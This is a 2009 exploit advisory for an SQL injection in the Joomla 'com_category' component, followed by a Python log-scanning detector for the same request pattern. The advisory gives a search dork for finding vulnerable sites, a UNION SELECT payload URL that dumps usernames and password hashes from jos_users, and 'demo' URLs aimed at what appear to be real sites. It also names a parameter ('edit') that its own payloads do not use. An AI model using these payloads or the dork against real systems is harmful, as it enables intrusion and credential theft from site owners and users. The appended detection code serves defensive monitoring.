###############################################################
#                                                             #
# Joomla component 'com_category' SQL injection vulnerability #
###############################################################
#
# dork: inurl:"com_category"
#
# xploited by Prince_Pwn3r
#
# contact: 2p0wn0rN0t2p0wn@gmail.com
###############################################################

+++++++ greetz to all p0wnbox.com members !!! +++++++

---------------------------------------------------------------

Vulnerable joomla component : com_category
vulnerable parameter: "edit" ($_GET)

---------------------------------------------------------------

Exploit :

http://www.site.com/index.php?option=com_category&task=loadCategory&catid*=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--

Demos :

http://www.p.com.au/index.php?option=com_category&task=loadCategory&catid=-9999+AND+1=0+union+all+select%201,2,group_concat(username,0x3a,password),4,5+from+jos_users--

or

http://ndsay.com/index.php?option=com_category&id=12&task=view&color=3&cat_id=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--

*could be different (eg: view&color=3&cat_id=)

# milw0rm.com [2009-07-11]
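A detection sketch for the request pattern above, added here as an example and not part of the original advisory: it scans web access logs for com_category requests whose category id carries SQL syntax or is not a plain integer. The log format (Apache combined-style) and the sample lines are constructed assumptions; the parameter names catid and cat_id are the two the advisory shows.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

ID_PARAMS = {"catid", "cat_id"}  # names shown in the advisory; may differ per site
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|group_concat\s*\(|jos_users|--|/\*", re.I | re.S)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Undo repeated URL-encoding (e.g. %2520) so matching sees the final text."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return 'sqli', 'non-integer', 'ok', or None if not a com_category request."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    pairs = parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True)
    params = {k.lower(): decode_fully(v) for k, v in pairs}
    if params.get("option", "").lower() != "com_category":
        return None
    verdict = "ok"
    for name in ID_PARAMS.intersection(params):
        if SQLI_RE.search(params[name]):
            return "sqli"
        if not re.fullmatch(r"\d+", params[name].strip()):
            verdict = "non-integer"  # a category id should only ever be digits
    return verdict

def scan(lines):
    """Return (line_number, verdict) for each com_category request that is not clean."""
    results = ((no, classify(line)) for no, line in enumerate(lines, 1))
    return [(no, v) for no, v in results if v not in (None, "ok")]

# Constructed sample access-log lines (documentation IP ranges, no real host).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Jul/2009:10:00:00 +0000] "GET /index.php?option=com_category&task=loadCategory&catid=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Jul/2009:10:01:00 +0000] "GET /index.php?option=com_category&task=loadCategory&catid=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users-- HTTP/1.1" 200 812',
    '198.51.100.7 - - [11/Jul/2009:10:02:00 +0000] "GET /index.php?option=com_category&id=12&task=view&color=3&cat_id=-9999+AND+1=0+union+all+select%201,2,3,4,5-- HTTP/1.1" 200 799',
    '198.51.100.7 - - [11/Jul/2009:10:03:00 +0000] "GET /index.php?option=com_category&task=loadCategory&catid=-1%2520UNION%2520SELECT%25201 HTTP/1.1" 200 640',
    '203.0.113.5 - - [11/Jul/2009:10:04:00 +0000] "GET /index.php?option=com_category&task=loadCategory&catid=12abc HTTP/1.1" 200 5120',
    '203.0.113.5 - - [11/Jul/2009:10:05:00 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for no, verdict in scan(SAMPLE_LOG):
        print(f"line {no}: {verdict}")
```

The "non-integer" verdict catches id values that fail the digits-only check even when they contain none of the listed SQL tokens.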